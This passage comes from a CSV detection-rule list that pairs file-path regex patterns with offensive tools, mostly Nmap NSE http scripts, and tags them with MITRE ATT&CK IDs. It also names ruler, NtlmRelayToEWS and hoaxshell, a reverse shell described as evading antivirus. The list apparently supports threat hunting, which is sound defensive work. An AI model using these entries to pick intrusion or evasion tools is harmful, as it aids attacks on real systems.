T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-method-tamper.nse*",".{0,1000}\/http\-method\-tamper\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-mobileversion-checker.nse*",".{0,1000}\/http\-mobileversion\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-nikto-scan.nse*",".{0,1000}\/http\-nikto\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-ntlm/ntlmtransport*",".{0,1000}\/http\-ntlm\/ntlmtransport.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","N/A","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","2082","347","2024-03-18T00:51:32Z","2016-08-18T15:05:13Z" "*/http-ntlm-info.nse*",".{0,1000}\/http\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-open-proxy.nse*",".{0,1000}\/http\-open\-proxy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-open-redirect.nse*",".{0,1000}\/http\-open\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-passwd.nse*",".{0,1000}\/http\-passwd\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-phpmyadmin-dir-traversal.nse*",".{0,1000}\/http\-phpmyadmin\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-phpself-xss.nse*",".{0,1000}\/http\-phpself\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-php-version.nse*",".{0,1000}\/http\-php\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-proxy-brute.nse*",".{0,1000}\/http\-proxy\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-put.nse*",".{0,1000}\/http\-put\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-qnap-nas-info.nse*",".{0,1000}\/http\-qnap\-nas\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-referer-checker.nse*",".{0,1000}\/http\-referer\-checker\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/httprelayserver.py*",".{0,1000}\/httprelayserver\.py.{0,1000}","offensive_tool_keyword","NtlmRelayToEWS","ntlmRelayToEWS is a tool for performing ntlm relay attacks on Exchange Web Services (EWS)","T1212 - T1557 - T1040 - T1078","TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/Arno0x/NtlmRelayToEWS","1","1","N/A","10","4","327","62","2018-01-15T12:48:02Z","2017-10-13T18:00:50Z" "*/http-request-smuggler/*",".{0,1000}\/http\-request\-smuggler\/.{0,1000}","offensive_tool_keyword","burpsuite","Collection of burpsuite plugins","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","Network Exploitation tools","https://github.com/Mr-xn/BurpSuite-collections","1","0","N/A","N/A","10","3044","627","2023-08-04T13:50:07Z","2020-01-25T02:07:37Z" "*/http-rfi-spider.nse*",".{0,1000}\/http\-rfi\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-robots.txt.nse*",".{0,1000}\/http\-robots\.txt\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-robtex-reverse-ip.nse*",".{0,1000}\/http\-robtex\-reverse\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-robtex-shared-ns.nse*",".{0,1000}\/http\-robtex\-shared\-ns\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/https_payload.ps1*",".{0,1000}\/https_payload\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "*/http-sap-netweaver-leak.nse*",".{0,1000}\/http\-sap\-netweaver\-leak\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-security-headers.nse*",".{0,1000}\/http\-security\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-server-header.nse*",".{0,1000}\/http\-server\-header\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-shellshock.nse*",".{0,1000}\/http\-shellshock\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-sitemap-generator.nse*",".{0,1000}\/http\-sitemap\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-slowloris.nse*",".{0,1000}\/http\-slowloris\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-slowloris-check.nse*",".{0,1000}\/http\-slowloris\-check\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-sql-injection.nse*",".{0,1000}\/http\-sql\-injection\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/https-redirect.nse*",".{0,1000}\/https\-redirect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-stored-xss.nse*",".{0,1000}\/http\-stored\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-svn-enum.nse*",".{0,1000}\/http\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-svn-info.nse*",".{0,1000}\/http\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-tenda-enum.nse*",".{0,1000}\/http\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","936","371","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/http-title.nse*",".{0,1000}\/http\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-tplink-dir-traversal.nse*",".{0,1000}\/http\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-trace.nse*",".{0,1000}\/http\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-traceroute.nse*",".{0,1000}\/http\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-trane-info.nse*",".{0,1000}\/http\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-unsafe-output-escaping.nse*",".{0,1000}\/http\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-useragent-tester.nse*",".{0,1000}\/http\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-userdir-enum.nse*",".{0,1000}\/http\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vhosts.nse*",".{0,1000}\/http\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-virustotal.nse*",".{0,1000}\/http\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vlcstreamer-ls.nse*",".{0,1000}\/http\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vmware-path-vuln.nse*",".{0,1000}\/http\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2006-3392.nse*",".{0,1000}\/http\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2009-3960.nse*",".{0,1000}\/http\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2010-0738.nse*",".{0,1000}\/http\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2010-2861.nse*",".{0,1000}\/http\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2011-3192.nse*",".{0,1000}\/http\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2011-3368.nse*",".{0,1000}\/http\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2012-1823.nse*",".{0,1000}\/http\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2013-0156.nse*",".{0,1000}\/http\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2013-6786.nse*",".{0,1000}\/http\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2013-7091.nse*",".{0,1000}\/http\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2126.nse*",".{0,1000}\/http\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2127.nse*",".{0,1000}\/http\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/http-vuln-cve2014-2128.nse*",".{0,1000}\/http\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 